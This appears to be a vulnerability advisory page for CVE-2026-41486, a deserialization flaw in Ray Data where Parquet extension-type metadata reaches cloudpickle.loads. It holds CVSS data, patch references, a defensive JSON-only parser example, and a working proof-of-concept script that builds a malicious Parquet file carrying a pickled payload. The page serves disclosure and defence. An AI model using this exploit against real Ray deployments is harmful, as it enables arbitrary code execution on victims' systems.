Security Vulnerability Report
CVE-2026-41486 CVSS 8.8 HIGH

Published: 2026-05-08 22:16:30
Last Modified: 2026-05-18 18:30:53

Description

Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read. This issue has been patched in version 2.55.0.
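As an added example (not from the advisory, the PoC, or Ray's code base), the following shows what a hardened `__arrow_ext_deserialize__`-style parser looks like: the field metadata is accepted only as a small JSON description of the tensor column, so a pickle stream is rejected before any object is built, and a triage helper applies that parser to the `ARROW:extension:name` / `ARROW:extension:metadata` keys PyArrow keeps in a field's metadata. It runs without pyarrow; `RAY_EXTENSION_NAMES` is taken from the description above, while the JSON layout, `ALLOWED_DTYPES` and `MAX_METADATA_BYTES` are illustrative assumptions, not Ray's actual 2.55.0 patch.

```python
import json
import pickle

# Extension type names the advisory says Ray 2.54.0 registered globally in PyArrow.
RAY_EXTENSION_NAMES = {b"ray.data.arrow_tensor", b"ray.data.arrow_tensor_v2",
                       b"ray.data.arrow_variable_shaped_tensor"}
# Assumed allowlist of element dtypes a tensor column may declare (illustrative).
ALLOWED_DTYPES = {"bool", "int8", "int16", "int32", "int64", "uint8", "float16", "float32", "float64"}
MAX_METADATA_BYTES = 4096


def safe_deserialize(serialized: bytes) -> dict:
    """Hardened stand-in for __arrow_ext_deserialize__: metadata must be a small JSON
    object with exactly 'shape' and 'dtype'; anything else (a pickle stream included)
    is rejected, so parsing the schema never executes attacker-controlled code."""
    if len(serialized) > MAX_METADATA_BYTES:
        raise ValueError("extension metadata too large")
    try:
        meta = json.loads(serialized.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("extension metadata is not JSON") from exc
    if not isinstance(meta, dict) or set(meta) != {"shape", "dtype"}:
        raise ValueError("unexpected metadata keys")
    shape, dtype = meta["shape"], meta["dtype"]
    # type(d) is int deliberately excludes bool, which isinstance() would accept.
    if not (isinstance(shape, list) and all(type(d) is int and d >= 0 for d in shape)):
        raise ValueError("shape must be a list of non-negative ints")
    if dtype not in ALLOWED_DTYPES:
        raise ValueError(f"dtype {dtype!r} not allowed")
    return {"shape": tuple(shape), "dtype": dtype}


def check_field_metadata(field_metadata: dict) -> str:
    """Triage one field's metadata dict as PyArrow exposes it (bytes keys and values).
    Returns 'ok', 'not-ray' (extension name is not one of Ray's), or 'reject:<reason>'."""
    if field_metadata.get(b"ARROW:extension:name") not in RAY_EXTENSION_NAMES:
        return "not-ray"
    try:
        safe_deserialize(field_metadata.get(b"ARROW:extension:metadata", b""))
    except ValueError as exc:
        return f"reject:{exc}"
    return "ok"


# Constructed samples (not from the advisory): a benign tensor column, and a field whose
# metadata is a pickle stream of a plain dict, standing in for any pickled payload.
BENIGN_FIELD = {
    b"ARROW:extension:name": b"ray.data.arrow_tensor",
    b"ARROW:extension:metadata": json.dumps({"shape": [3, 224, 224], "dtype": "uint8"}).encode(),
}
PICKLED_FIELD = {b"ARROW:extension:name": b"ray.data.arrow_tensor",
                 b"ARROW:extension:metadata": pickle.dumps({"shape": [3]})}
```

The same rejection path covers an absent or empty `ARROW:extension:metadata` value, which is why the helper defaults it to `b""` rather than treating it as trusted.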

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:anyscale:ray:2.54.0:*:*:*:*:*:*:* - VULNERABLE
Ray 2.54.0
Ray < 2.55.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import pyarrow as pa
import pyarrow.parquet as pq
import cloudpickle
import os

# Define a malicious payload to be executed
# For demonstration, this creates a file, but could be any command
def malicious_function():
    print("[!] RCE Triggered via Cloudpickle")
    with open("/tmp/pwned.txt", "w") as f:
        f.write("CVE-2026-41486 Exploited")

# Serialize the payload using cloudpickle
serialized_payload = cloudpickle.dumps(malicious_function)

# Construct Parquet metadata pointing to Ray's extension type
# Ray registers 'ray.data.arrow_tensor' globally.
# We set the metadata key 'ARROW:extension:metadata' to our payload.
metadata = {
    b"ARROW:extension:name": b"ray.data.arrow_tensor",
    b"ARROW:extension:metadata": serialized_payload
}

# Create a field with the malicious metadata
field = pa.field("exploit_field", pa.binary(), metadata=metadata)
schema = pa.schema([field])

# Create a dummy table with minimal data
table = pa.table({"exploit_field": [b"dummy_data"]})

# Write the malicious Parquet file
pq.write_table(table, "cve_2026_41486_exploit.parquet", schema=schema)
print("Malicious Parquet file generated: cve_2026_41486_exploit.parquet")
print("When a vulnerable Ray version reads this file, the payload will execute.")
```

References

https://github.com/ray-project/ray/commit/c02bd31ae31996805868baa446a131a8d304525f (Patch)
https://github.com/ray-project/ray/pull/62056 (Issue Tracking, Patch)
https://github.com/ray-project/ray/releases/tag/ray-2.55.0 (Product, Release Notes)
https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r (Vendor Advisory)

Weaknesses: CWE-94, CWE-502
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-41486", "sourceIdentifier": "[email protected]", "published": "2026-05-08T22:16:29.903", "lastModified": "2026-05-18T18:30:53.233", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ray is an AI compute engine. From version 2.54.0 to before version 2.55.0, Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read. This issue has been patched in version 2.55.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anyscale:ray:2.54.0:*:*:*:*:*:*:*", "matchCriteriaId": "79D84338-429D-4550-9640-092CA38479B8"}]}]}], "references": [{"url": "https://github.com/ray-project/ray/commit/c02bd31ae31996805868baa446a131a8d304525f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ray-project/ray/pull/62056", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/ray-project/ray/releases/tag/ray-2.55.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```